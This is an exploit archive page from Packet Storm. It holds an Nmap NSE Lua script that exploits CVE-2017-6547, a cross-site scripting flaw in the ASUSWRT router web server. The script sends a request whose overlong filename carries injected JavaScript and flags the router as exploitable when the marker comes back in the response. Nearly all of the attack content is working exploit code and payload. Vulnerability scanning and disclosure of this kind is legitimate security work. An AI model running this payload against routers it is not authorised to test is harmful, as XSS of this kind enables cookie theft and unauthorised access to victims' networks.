exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ASUS WRT Cross Site Scripting Nmap NSE Script

ASUS WRT Cross Site Scripting Nmap NSE Script
Posted Apr 7, 2017
Authored by Rewanth Cool

This NSE script for Nmap exploits a cross site scripting vulnerability in ASUS WRT.

tags | exploit, xss
advisories | CVE-2017-6547
SHA-256 | dc729410f996cb5390eaf15cba905ed977d2a0114ef1313e0b4da162988f05e0

ASUS WRT Cross Site Scripting Nmap NSE Script

Change Mirror Download
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"

description = [[
ASUSWRT is a wireless router operating system that powers many routers produced by ASUS.
Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT
on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary
JavaScript by requesting filenames longer than 50 characters.
Attackers can exploit these issues to execute arbitrary code in the context
of the user running the affected application or steal cookie-based authentication
credentials and gain unauthorized access.
Failed exploit attempts will likely cause denial-of-service conditions.
NOTE: This vulnerability is yet to be patched by the vendors.
]]

---
-- @usage
-- nmap --script http-asuswrt-xss <ip>
--
-- @args
-- http-asuswrt-xss.uri
-- Default: '/' (Preferred)
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | http-asuswrt-xss
-- | VULNERABLE:
-- | XSS
-- | State: VULNERABLE (Exploitable)
-- | IDs:
-- | CVE: CVE-2017-6547
-- | Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT
-- | on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary
-- | JavaScript by requesting filenames longer than 50 characters.
-- |
-- | NOTE: This vulnerability is yet to be patched by the vendors.
-- |
-- | References:
-- | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6547
--
---

author = "Rewanth Cool"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit", "dos"}

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

action = function(host, port)
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"

local payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('nmapXSSasuswrtScanner');'A"
local pattern = "nmapXSSasuswrtScanner"

-- Exploiting the vulnerability
local response = http.get( host, port, uri..payload )

if( response.status == 200 ) then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = "Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT",
state = vulns.STATE.NOT_VULN,
description = [[
Cross-site scripting (XSS) vulnerability in httpd in ASUS ASUSWRT
on RT-AC53 3.0.0.4.380.6038 devices allows remote attackersto inject arbitrary
JavaScript by requesting filenames longer than 50 characters.
NOTE: This vulnerability is yet to be patched by the vendors.
]],
IDS = {
CVE = "CVE-2017-6547",
references = {
"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6547"
},
dates = {
disclosure = {
year = "2017",
month = "03",
day = "08"
},
}
}
}

if( string.match(response.body, pattern) ) then
vuln.state = vulns.STATE.EXPLOIT
vuln.exploit_results = payload
return vulnReport:make_output(vuln)
end
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close